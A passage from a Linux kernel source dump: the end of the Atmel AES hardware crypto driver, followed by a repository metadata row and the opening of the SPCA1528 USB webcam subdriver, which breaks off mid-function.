rctx->mode &= AES_FLAGS_MODE_MASK;
dd->flags = (dd->flags & ~AES_FLAGS_MODE_MASK) | rctx->mode;
dd->ctx = ctx;
ctx->dd = dd;
err = atmel_aes_write_ctrl(dd);
if (!err) {
if (dd->total > ATMEL_AES_DMA_THRESHOLD)
err = atmel_aes_crypt_dma_start(dd);
else
err = atmel_aes_crypt_cpu_start(dd);
}
if (err) {
/* aes_task will not finish it, so do it here */
atmel_aes_finish_req(dd, err);
tasklet_schedule(&dd->queue_task);
}
return ret;
}
static int atmel_aes_crypt_dma_stop(struct atmel_aes_dev *dd)
{
int err = -EINVAL;
size_t count;
if (dd->flags & AES_FLAGS_DMA) {
err = 0;
if (dd->flags & AES_FLAGS_FAST) {
dma_unmap_sg(dd->dev, dd->out_sg, 1, DMA_FROM_DEVICE);
dma_unmap_sg(dd->dev, dd->in_sg, 1, DMA_TO_DEVICE);
} else {
dma_sync_single_for_device(dd->dev, dd->dma_addr_out,
dd->dma_size, DMA_FROM_DEVICE);
/* copy data */
count = atmel_aes_sg_copy(&dd->out_sg, &dd->out_offset,
dd->buf_out, dd->buflen, dd->dma_size, 1);
if (count != dd->dma_size) {
err = -EINVAL;
pr_err("not all data converted: %u\n", count);
}
}
}
return err;
}
static int atmel_aes_buff_init(struct atmel_aes_dev *dd)
{
int err = -ENOMEM;
dd->buf_in = (void *)__get_free_pages(GFP_KERNEL, 0);
dd->buf_out = (void *)__get_free_pages(GFP_KERNEL, 0);
dd->buflen = PAGE_SIZE;
dd->buflen &= ~(AES_BLOCK_SIZE - 1);
if (!dd->buf_in || !dd->buf_out) {
dev_err(dd->dev, "unable to alloc pages.\n");
goto err_alloc;
}
/* MAP here */
dd->dma_addr_in = dma_map_single(dd->dev, dd->buf_in,
dd->buflen, DMA_TO_DEVICE);
if (dma_mapping_error(dd->dev, dd->dma_addr_in)) {
dev_err(dd->dev, "dma %d bytes error\n", dd->buflen);
err = -EINVAL;
goto err_map_in;
}
dd->dma_addr_out = dma_map_single(dd->dev, dd->buf_out,
dd->buflen, DMA_FROM_DEVICE);
if (dma_mapping_error(dd->dev, dd->dma_addr_out)) {
dev_err(dd->dev, "dma %d bytes error\n", dd->buflen);
err = -EINVAL;
goto err_map_out;
}
return 0;
err_map_out:
dma_unmap_single(dd->dev, dd->dma_addr_in, dd->buflen,
DMA_TO_DEVICE);
err_map_in:
free_page((unsigned long)dd->buf_out);
free_page((unsigned long)dd->buf_in);
err_alloc:
if (err)
pr_err("error: %d\n", err);
return err;
}
static void atmel_aes_buff_cleanup(struct atmel_aes_dev *dd)
{
dma_unmap_single(dd->dev, dd->dma_addr_out, dd->buflen,
DMA_FROM_DEVICE);
dma_unmap_single(dd->dev, dd->dma_addr_in, dd->buflen,
DMA_TO_DEVICE);
free_page((unsigned long)dd->buf_out);
free_page((unsigned long)dd->buf_in);
}
static int atmel_aes_crypt(struct ablkcipher_request *req, unsigned long mode)
{
struct atmel_aes_ctx *ctx = crypto_ablkcipher_ctx(
crypto_ablkcipher_reqtfm(req));
struct atmel_aes_reqctx *rctx = ablkcipher_request_ctx(req);
struct atmel_aes_dev *dd;
if (mode & AES_FLAGS_CFB8) {
if (!IS_ALIGNED(req->nbytes, CFB8_BLOCK_SIZE)) {
pr_err("request size is not exact amount of CFB8 blocks\n");
return -EINVAL;
}
ctx->block_size = CFB8_BLOCK_SIZE;
} else if (mode & AES_FLAGS_CFB16) {
if (!IS_ALIGNED(req->nbytes, CFB16_BLOCK_SIZE)) {
pr_err("request size is not exact amount of CFB16 blocks\n");
return -EINVAL;
}
ctx->block_size = CFB16_BLOCK_SIZE;
} else if (mode & AES_FLAGS_CFB32) {
if (!IS_ALIGNED(req->nbytes, CFB32_BLOCK_SIZE)) {
pr_err("request size is not exact amount of CFB32 blocks\n");
return -EINVAL;
}
ctx->block_size = CFB32_BLOCK_SIZE;
} else {
if (!IS_ALIGNED(req->nbytes, AES_BLOCK_SIZE)) {
pr_err("request size is not exact amount of AES blocks\n");
return -EINVAL;
}
ctx->block_size = AES_BLOCK_SIZE;
}
dd = atmel_aes_find_dev(ctx);
if (!dd)
return -ENODEV;
rctx->mode = mode;
return atmel_aes_handle_queue(dd, req);
}
static bool atmel_aes_filter(struct dma_chan *chan, void *slave)
{
struct at_dma_slave *sl = slave;
if (sl && sl->dma_dev == chan->device->dev) {
chan->private = sl;
return true;
} else {
return false;
}
}
static int atmel_aes_dma_init(struct atmel_aes_dev *dd,
struct crypto_platform_data *pdata)
{
int err = -ENOMEM;
dma_cap_mask_t mask_in, mask_out;
if (pdata && pdata->dma_slave->txdata.dma_dev &&
pdata->dma_slave->rxdata.dma_dev) {
/* Try to grab 2 DMA channels */
dma_cap_zero(mask_in);
dma_cap_set(DMA_SLAVE, mask_in);
dd->dma_lch_in.chan = dma_request_channel(mask_in,
atmel_aes_filter, &pdata->dma_slave->rxdata);
if (!dd->dma_lch_in.chan)
goto err_dma_in;
dd->dma_lch_in.dma_conf.direction = DMA_MEM_TO_DEV;
dd->dma_lch_in.dma_conf.dst_addr = dd->phys_base +
AES_IDATAR(0);
dd->dma_lch_in.dma_conf.src_maxburst = dd->caps.max_burst_size;
dd->dma_lch_in.dma_conf.src_addr_width =
DMA_SLAVE_BUSWIDTH_4_BYTES;
dd->dma_lch_in.dma_conf.dst_maxburst = dd->caps.max_burst_size;
dd->dma_lch_in.dma_conf.dst_addr_width =
DMA_SLAVE_BUSWIDTH_4_BYTES;
dd->dma_lch_in.dma_conf.device_fc = false;
dma_cap_zero(mask_out);
dma_cap_set(DMA_SLAVE, mask_out);
dd->dma_lch_out.chan = dma_request_channel(mask_out,
atmel_aes_filter, &pdata->dma_slave->txdata);
if (!dd->dma_lch_out.chan)
goto err_dma_out;
dd->dma_lch_out.dma_conf.direction = DMA_DEV_TO_MEM;
dd->dma_lch_out.dma_conf.src_addr = dd->phys_base +
AES_ODATAR(0);
dd->dma_lch_out.dma_conf.src_maxburst = dd->caps.max_burst_size;
dd->dma_lch_out.dma_conf.src_addr_width =
DMA_SLAVE_BUSWIDTH_4_BYTES;
dd->dma_lch_out.dma_conf.dst_maxburst = dd->caps.max_burst_size;
dd->dma_lch_out.dma_conf.dst_addr_width =
DMA_SLAVE_BUSWIDTH_4_BYTES;
dd->dma_lch_out.dma_conf.device_fc = false;
return 0;
} else {
return -ENODEV;
}
err_dma_out:
dma_release_channel(dd->dma_lch_in.chan);
err_dma_in:
return err;
}
static void atmel_aes_dma_cleanup(struct atmel_aes_dev *dd)
{
dma_release_channel(dd->dma_lch_in.chan);
dma_release_channel(dd->dma_lch_out.chan);
}
static int atmel_aes_setkey(struct crypto_ablkcipher *tfm, const u8 *key,
unsigned int keylen)
{
struct atmel_aes_ctx *ctx = crypto_ablkcipher_ctx(tfm);
if (keylen != AES_KEYSIZE_128 && keylen != AES_KEYSIZE_192 &&
keylen != AES_KEYSIZE_256) {
crypto_ablkcipher_set_flags(tfm, CRYPTO_TFM_RES_BAD_KEY_LEN);
return -EINVAL;
}
memcpy(ctx->key, key, keylen);
ctx->keylen = keylen;
return 0;
}
static int atmel_aes_ecb_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT);
}
static int atmel_aes_ecb_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
0);
}
static int atmel_aes_cbc_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_CBC);
}
static int atmel_aes_cbc_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_CBC);
}
static int atmel_aes_ofb_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_OFB);
}
static int atmel_aes_ofb_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_OFB);
}
static int atmel_aes_cfb_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB128);
}
static int atmel_aes_cfb_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_CFB | AES_FLAGS_CFB128);
}
static int atmel_aes_cfb64_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB64);
}
static int atmel_aes_cfb64_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_CFB | AES_FLAGS_CFB64);
}
static int atmel_aes_cfb32_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB32);
}
static int atmel_aes_cfb32_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_CFB | AES_FLAGS_CFB32);
}
static int atmel_aes_cfb16_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB16);
}
static int atmel_aes_cfb16_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_CFB | AES_FLAGS_CFB16);
}
static int atmel_aes_cfb8_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB8);
}
static int atmel_aes_cfb8_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_CFB | AES_FLAGS_CFB8);
}
static int atmel_aes_ctr_encrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_ENCRYPT | AES_FLAGS_CTR);
}
static int atmel_aes_ctr_decrypt(struct ablkcipher_request *req)
{
return atmel_aes_crypt(req,
AES_FLAGS_CTR);
}
static int atmel_aes_cra_init(struct crypto_tfm *tfm)
{
tfm->crt_ablkcipher.reqsize = sizeof(struct atmel_aes_reqctx);
return 0;
}
static void atmel_aes_cra_exit(struct crypto_tfm *tfm)
{
}
static struct crypto_alg aes_algs[] = {
{
.cra_name = "ecb(aes)",
.cra_driver_name = "atmel-ecb-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_ecb_encrypt,
.decrypt = atmel_aes_ecb_decrypt,
}
},
{
.cra_name = "cbc(aes)",
.cra_driver_name = "atmel-cbc-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cbc_encrypt,
.decrypt = atmel_aes_cbc_decrypt,
}
},
{
.cra_name = "ofb(aes)",
.cra_driver_name = "atmel-ofb-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_ofb_encrypt,
.decrypt = atmel_aes_ofb_decrypt,
}
},
{
.cra_name = "cfb(aes)",
.cra_driver_name = "atmel-cfb-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb_encrypt,
.decrypt = atmel_aes_cfb_decrypt,
}
},
{
.cra_name = "cfb32(aes)",
.cra_driver_name = "atmel-cfb32-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = CFB32_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0x3,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb32_encrypt,
.decrypt = atmel_aes_cfb32_decrypt,
}
},
{
.cra_name = "cfb16(aes)",
.cra_driver_name = "atmel-cfb16-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = CFB16_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0x1,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb16_encrypt,
.decrypt = atmel_aes_cfb16_decrypt,
}
},
{
.cra_name = "cfb8(aes)",
.cra_driver_name = "atmel-cfb8-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = CFB64_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0x0,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb8_encrypt,
.decrypt = atmel_aes_cfb8_decrypt,
}
},
{
.cra_name = "ctr(aes)",
.cra_driver_name = "atmel-ctr-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_ctr_encrypt,
.decrypt = atmel_aes_ctr_decrypt,
}
},
};
static struct crypto_alg aes_cfb64_alg = {
.cra_name = "cfb64(aes)",
.cra_driver_name = "atmel-cfb64-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = CFB64_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0x7,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb64_encrypt,
.decrypt = atmel_aes_cfb64_decrypt,
}
};
static void atmel_aes_queue_task(unsigned long data)
{
struct atmel_aes_dev *dd = (struct atmel_aes_dev *)data;
atmel_aes_handle_queue(dd, NULL);
}
static void atmel_aes_done_task(unsigned long data)
{
struct atmel_aes_dev *dd = (struct atmel_aes_dev *) data;
int err;
if (!(dd->flags & AES_FLAGS_DMA)) {
atmel_aes_read_n(dd, AES_ODATAR(0), (u32 *) dd->buf_out,
dd->bufcnt >> 2);
if (sg_copy_from_buffer(dd->out_sg, dd->nb_out_sg,
dd->buf_out, dd->bufcnt))
err = 0;
else
err = -EINVAL;
goto cpu_end;
}
err = atmel_aes_crypt_dma_stop(dd);
err = dd->err ? : err;
if (dd->total && !err) {
if (dd->flags & AES_FLAGS_FAST) {
dd->in_sg = sg_next(dd->in_sg);
dd->out_sg = sg_next(dd->out_sg);
if (!dd->in_sg || !dd->out_sg)
err = -EINVAL;
}
if (!err)
err = atmel_aes_crypt_dma_start(dd);
if (!err)
return; /* DMA started. Not fininishing. */
}
cpu_end:
atmel_aes_finish_req(dd, err);
atmel_aes_handle_queue(dd, NULL);
}
static irqreturn_t atmel_aes_irq(int irq, void *dev_id)
{
struct atmel_aes_dev *aes_dd = dev_id;
u32 reg;
reg = atmel_aes_read(aes_dd, AES_ISR);
if (reg & atmel_aes_read(aes_dd, AES_IMR)) {
atmel_aes_write(aes_dd, AES_IDR, reg);
if (AES_FLAGS_BUSY & aes_dd->flags)
tasklet_schedule(&aes_dd->done_task);
else
dev_warn(aes_dd->dev, "AES interrupt when no active requests.\n");
return IRQ_HANDLED;
}
return IRQ_NONE;
}
static void atmel_aes_unregister_algs(struct atmel_aes_dev *dd)
{
int i;
for (i = 0; i < ARRAY_SIZE(aes_algs); i++)
crypto_unregister_alg(&aes_algs[i]);
if (dd->caps.has_cfb64)
crypto_unregister_alg(&aes_cfb64_alg);
}
static int atmel_aes_register_algs(struct atmel_aes_dev *dd)
{
int err, i, j;
for (i = 0; i < ARRAY_SIZE(aes_algs); i++) {
err = crypto_register_alg(&aes_algs[i]);
if (err)
goto err_aes_algs;
}
if (dd->caps.has_cfb64) {
err = crypto_register_alg(&aes_cfb64_alg);
if (err)
goto err_aes_cfb64_alg;
}
return 0;
err_aes_cfb64_alg:
i = ARRAY_SIZE(aes_algs);
err_aes_algs:
for (j = 0; j < i; j++)
crypto_unregister_alg(&aes_algs[j]);
return err;
}
static void atmel_aes_get_cap(struct atmel_aes_dev *dd)
{
dd->caps.has_dualbuff = 0;
dd->caps.has_cfb64 = 0;
dd->caps.max_burst_size = 1;
/* keep only major version number */
switch (dd->hw_version & 0xff0) {
case 0x130:
dd->caps.has_dualbuff = 1;
dd->caps.has_cfb64 = 1;
dd->caps.max_burst_size = 4;
break;
case 0x120:
break;
default:
dev_warn(dd->dev,
"Unmanaged aes version, set minimum capabilities\n");
break;
}
}
static int atmel_aes_probe(struct platform_device *pdev)
{
struct atmel_aes_dev *aes_dd;
struct crypto_platform_data *pdata;
struct device *dev = &pdev->dev;
struct resource *aes_res;
unsigned long aes_phys_size;
int err;
pdata = pdev->dev.platform_data;
if (!pdata) {
err = -ENXIO;
goto aes_dd_err;
}
aes_dd = kzalloc(sizeof(struct atmel_aes_dev), GFP_KERNEL);
if (aes_dd == NULL) {
dev_err(dev, "unable to alloc data struct.\n");
err = -ENOMEM;
goto aes_dd_err;
}
aes_dd->dev = dev;
platform_set_drvdata(pdev, aes_dd);
INIT_LIST_HEAD(&aes_dd->list);
tasklet_init(&aes_dd->done_task, atmel_aes_done_task,
(unsigned long)aes_dd);
tasklet_init(&aes_dd->queue_task, atmel_aes_queue_task,
(unsigned long)aes_dd);
crypto_init_queue(&aes_dd->queue, ATMEL_AES_QUEUE_LENGTH);
aes_dd->irq = -1;
/* Get the base address */
aes_res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
if (!aes_res) {
dev_err(dev, "no MEM resource info\n");
err = -ENODEV;
goto res_err;
}
aes_dd->phys_base = aes_res->start;
aes_phys_size = resource_size(aes_res);
/* Get the IRQ */
aes_dd->irq = platform_get_irq(pdev, 0);
if (aes_dd->irq < 0) {
dev_err(dev, "no IRQ resource info\n");
err = aes_dd->irq;
goto aes_irq_err;
}
err = request_irq(aes_dd->irq, atmel_aes_irq, IRQF_SHARED, "atmel-aes",
aes_dd);
if (err) {
dev_err(dev, "unable to request aes irq.\n");
goto aes_irq_err;
}
/* Initializing the clock */
aes_dd->iclk = clk_get(&pdev->dev, "aes_clk");
if (IS_ERR(aes_dd->iclk)) {
dev_err(dev, "clock intialization failed.\n");
err = PTR_ERR(aes_dd->iclk);
goto clk_err;
}
aes_dd->io_base = ioremap(aes_dd->phys_base, aes_phys_size);
if (!aes_dd->io_base) {
dev_err(dev, "can't ioremap\n");
err = -ENOMEM;
goto aes_io_err;
}
atmel_aes_hw_version_init(aes_dd);
atmel_aes_get_cap(aes_dd);
err = atmel_aes_buff_init(aes_dd);
if (err)
goto err_aes_buff;
err = atmel_aes_dma_init(aes_dd, pdata);
if (err)
goto err_aes_dma;
spin_lock(&atmel_aes.lock);
list_add_tail(&aes_dd->list, &atmel_aes.dev_list);
spin_unlock(&atmel_aes.lock);
err = atmel_aes_register_algs(aes_dd);
if (err)
goto err_algs;
dev_info(dev, "Atmel AES\n");
return 0;
err_algs:
spin_lock(&atmel_aes.lock);
list_del(&aes_dd->list);
spin_unlock(&atmel_aes.lock);
atmel_aes_dma_cleanup(aes_dd);
err_aes_dma:
atmel_aes_buff_cleanup(aes_dd);
err_aes_buff:
iounmap(aes_dd->io_base);
aes_io_err:
clk_put(aes_dd->iclk);
clk_err:
free_irq(aes_dd->irq, aes_dd);
aes_irq_err:
res_err:
tasklet_kill(&aes_dd->done_task);
tasklet_kill(&aes_dd->queue_task);
kfree(aes_dd);
aes_dd = NULL;
aes_dd_err:
dev_err(dev, "initialization failed.\n");
return err;
}
static int atmel_aes_remove(struct platform_device *pdev)
{
static struct atmel_aes_dev *aes_dd;
aes_dd = platform_get_drvdata(pdev);
if (!aes_dd)
return -ENODEV;
spin_lock(&atmel_aes.lock);
list_del(&aes_dd->list);
spin_unlock(&atmel_aes.lock);
atmel_aes_unregister_algs(aes_dd);
tasklet_kill(&aes_dd->done_task);
tasklet_kill(&aes_dd->queue_task);
atmel_aes_dma_cleanup(aes_dd);
iounmap(aes_dd->io_base);
clk_put(aes_dd->iclk);
if (aes_dd->irq > 0)
free_irq(aes_dd->irq, aes_dd);
kfree(aes_dd);
aes_dd = NULL;
return 0;
}
static struct platform_driver atmel_aes_driver = {
.probe = atmel_aes_probe,
.remove = atmel_aes_remove,
.driver = {
.name = "atmel_aes",
.owner = THIS_MODULE,
},
};
module_platform_driver(atmel_aes_driver);
MODULE_DESCRIPTION("Atmel AES hw acceleration support.");
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR("Nicolas Royer - Eukréa Electromatique");
| gpl-2.0 |
elbermu/cerux_kernel-touchwiz | drivers/media/video/gspca/spca1528.c | 3073 | 13931 | /*
* spca1528 subdriver
*
* Copyright (C) 2010 Jean-Francois Moine (http://moinejf.free.fr)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#define MODULE_NAME "spca1528"
#include "gspca.h"
#include "jpeg.h"
MODULE_AUTHOR("Jean-Francois Moine <http://moinejf.free.fr>");
MODULE_DESCRIPTION("SPCA1528 USB Camera Driver");
MODULE_LICENSE("GPL");
/* specific webcam descriptor */
struct sd {
struct gspca_dev gspca_dev; /* !! must be the first item */
u8 brightness;
u8 contrast;
u8 hue;
u8 color;
u8 sharpness;
u8 pkt_seq;
u8 jpeg_hdr[JPEG_HDR_SZ];
};
/* V4L2 controls supported by the driver */
static int sd_setbrightness(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getbrightness(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_setcontrast(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getcontrast(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_sethue(struct gspca_dev *gspca_dev, __s32 val);
static int sd_gethue(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_setcolor(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getcolor(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_setsharpness(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getsharpness(struct gspca_dev *gspca_dev, __s32 *val);
static const struct ctrl sd_ctrls[] = {
{
{
.id = V4L2_CID_BRIGHTNESS,
.type = V4L2_CTRL_TYPE_INTEGER,
.name = "Brightness",
.minimum = 0,
.maximum = 255,
.step = 1,
#define BRIGHTNESS_DEF 128
.default_value = BRIGHTNESS_DEF,
},
.set = sd_setbrightness,
.get = sd_getbrightness,
},
{
{
.id = V4L2_CID_CONTRAST,
.type = V4L2_CTRL_TYPE_INTEGER,
.name = "Contrast",
.minimum = 0,
.maximum = 8,
.step = 1,
#define CONTRAST_DEF 1
.default_value = CONTRAST_DEF,
},
.set = sd_setcontrast,
.get = sd_getcontrast,
},
{
{
.id = V4L2_CID_HUE,
.type = V4L2_CTRL_TYPE_INTEGER,
.name = "Hue",
.minimum = 0,
.maximum = 255,
.step = 1,
#define HUE_DEF 0
.default_value = HUE_DEF,
},
.set = sd_sethue,
.get = sd_gethue,
},
{
{
.id = V4L2_CID_SATURATION,
.type = V4L2_CTRL_TYPE_INTEGER,
.name = "Saturation",
.minimum = 0,
.maximum = 8,
.step = 1,
#define COLOR_DEF 1
.default_value = COLOR_DEF,
},
.set = sd_setcolor,
.get = sd_getcolor,
},
{
{
.id = V4L2_CID_SHARPNESS,
.type = V4L2_CTRL_TYPE_INTEGER,
.name = "Sharpness",
.minimum = 0,
.maximum = 255,
.step = 1,
#define SHARPNESS_DEF 0
.default_value = SHARPNESS_DEF,
},
.set = sd_setsharpness,
.get = sd_getsharpness,
},
};
static const struct v4l2_pix_format vga_mode[] = {
/* (does not work correctly)
{176, 144, V4L2_PIX_FMT_JPEG, V4L2_FIELD_NONE,
.bytesperline = 176,
.sizeimage = 176 * 144 * 5 / 8 + 590,
.colorspace = V4L2_COLORSPACE_JPEG,
.priv = 3},
*/
{320, 240, V4L2_PIX_FMT_JPEG, V4L2_FIELD_NONE,
.bytesperline = 320,
.sizeimage = 320 * 240 * 4 / 8 + 590,
.colorspace = V4L2_COLORSPACE_JPEG,
.priv = 2},
{640, 480, V4L2_PIX_FMT_JPEG, V4L2_FIELD_NONE,
.bytesperline = 640,
.sizeimage = 640 * 480 * 3 / 8 + 590,
.colorspace = V4L2_COLORSPACE_JPEG,
.priv = 1},
};
/* read <len> bytes to gspca usb_buf */
static void reg_r(struct gspca_dev *gspca_dev,
u8 req,
u16 index,
int len)
{
#if USB_BUF_SZ < 64
#error "USB buffer too small"
#endif
struct usb_device *dev = gspca_dev->dev;
int ret;
if (gspca_dev->usb_err < 0)
return;
ret = usb_control_msg(dev, usb_rcvctrlpipe(dev, 0),
req,
USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
0x0000, /* value */
index,
gspca_dev->usb_buf, len,
500);
PDEBUG(D_USBI, "GET %02x 0000 %04x %02x", req, index,
gspca_dev->usb_buf[0]);
if (ret < 0) {
err("reg_r err %d", ret);
gspca_dev->usb_err = ret;
}
}
static void reg_w(struct gspca_dev *gspca_dev,
u8 req,
u16 value,
u16 index)
{
struct usb_device *dev = gspca_dev->dev;
int ret;
if (gspca_dev->usb_err < 0)
return;
PDEBUG(D_USBO, "SET %02x %04x %04x", req, value, index);
ret = usb_control_msg(dev, usb_sndctrlpipe(dev, 0),
req,
USB_DIR_OUT | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
value, index,
NULL, 0, 500);
if (ret < 0) {
err("reg_w err %d", ret);
gspca_dev->usb_err = ret;
}
}
static void reg_wb(struct gspca_dev *gspca_dev,
u8 req,
u16 value,
u16 index,
u8 byte)
{
struct usb_device *dev = gspca_dev->dev;
int ret;
if (gspca_dev->usb_err < 0)
return;
